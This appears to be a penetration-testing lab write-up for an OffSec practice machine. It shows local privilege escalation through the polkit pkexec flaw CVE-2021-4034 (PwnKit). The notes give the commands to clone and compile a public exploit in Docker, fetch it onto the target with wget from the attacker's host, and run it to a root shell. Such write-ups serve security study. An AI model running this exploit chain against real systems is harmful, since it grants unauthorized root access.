CVE-2021-4034
PEAS has identified that the target system is vulnerable to CVE-2021-4034
/Practice/Escape_OffSec/5-Privilege_Escalation/attachments/Pasted-image-20250306201210.png)
A vulnerability, which was classified as critical, has been found in polkit (version now known). This issue affects some unknown processing of the file /usr/bin/pkexec. The manipulation with an unknown input leads to a access control vulnerability. Using CWE to declare the problem leads to CWE-284. The product does not restrict or incorrectly restricts access to a resource from an unauthorized actor. Impacted is confidentiality, integrity, and availability.
Exploit
/Practice/Escape_OffSec/5-Privilege_Escalation/attachments/Pasted-image-20250306201257.png)
Exploit found online
Debian-snmp@escape:/var/tmp$ gcc
gcc
Command 'gcc' not found, but can be installed with:
apt install gcc
Please ask your administrator.
Debian-snmp@escape:/var/tmp$ cc
cc
Command 'cc' not found, but can be installed with:
apt install gcc
apt install clang
apt install pentium-builder
apt install tcc
Ask your administrator to install one of them.No local compiler available. Opting out to remote compilation
Docker Exploit Development
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/escape_offsec]
└─$ docker run -it --entrypoint "/bin/bash" -v ./:/root/host --name escape_offsec ubuntu:18.04
root@1ed01be491bc:/# cd root; apt update -y; apt install git make nano gcc gcc-multilib -ySetting up the environment
root@1ed01be491bc:~# git clone https://github.com/berdav/CVE-2021-4034; cd CVE-2021-4034; make; cd ..; tar -czf CVE-2021-4034.tar.gz ./CVE-2021-4034; cp CVE-2021-4034.tar.gz ./host/
Cloning into 'CVE-2021-4034'...
remote: Enumerating objects: 92, done.
remote: Counting objects: 100% (36/36), done.
remote: Compressing objects: 100% (17/17), done.
remote: Total 92 (delta 24), reused 19 (delta 19), pack-reused 56 (from 1)
Unpacking objects: 100% (92/92), done.
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall cve-2021-4034.c -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /bin/true GCONV_PATH=./pwnkit.so:.Downloading, compiling & packaging the exploit
Exploitation
Debian-snmp@escape:/var/tmp$ wget -q http://192.168.45.153/CVE-2021-4034.tar.gz; tar -xf CVE-2021-4034.tar.gz; cd CVE-2021-4034Delivery complete
Debian-snmp@escape:/var/tmp/CVE-2021-4034$ ./cve-2021-4034
./cve-2021-4034
# whoami
whoami
root
# hostname
hostname
escape
# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
3: docker0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:7e:d3:9c:0e brd ff:ff:ff:ff:ff:ff
inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
valid_lft forever preferred_lft forever
inet6 fe80::42:7eff:fed3:9c0e/64 scope link
valid_lft forever preferred_lft forever
5: vethe544e37@if4: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP group default
link/ether 92:34:d7:75:cf:89 brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet6 fe80::9034:d7ff:fe75:cf89/64 scope link
valid_lft forever preferred_lft forever
6: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 00:50:56:9e:76:59 brd ff:ff:ff:ff:ff:ff
inet 192.168.122.113/24 brd 192.168.122.255 scope global ens192
valid_lft forever preferred_lft forever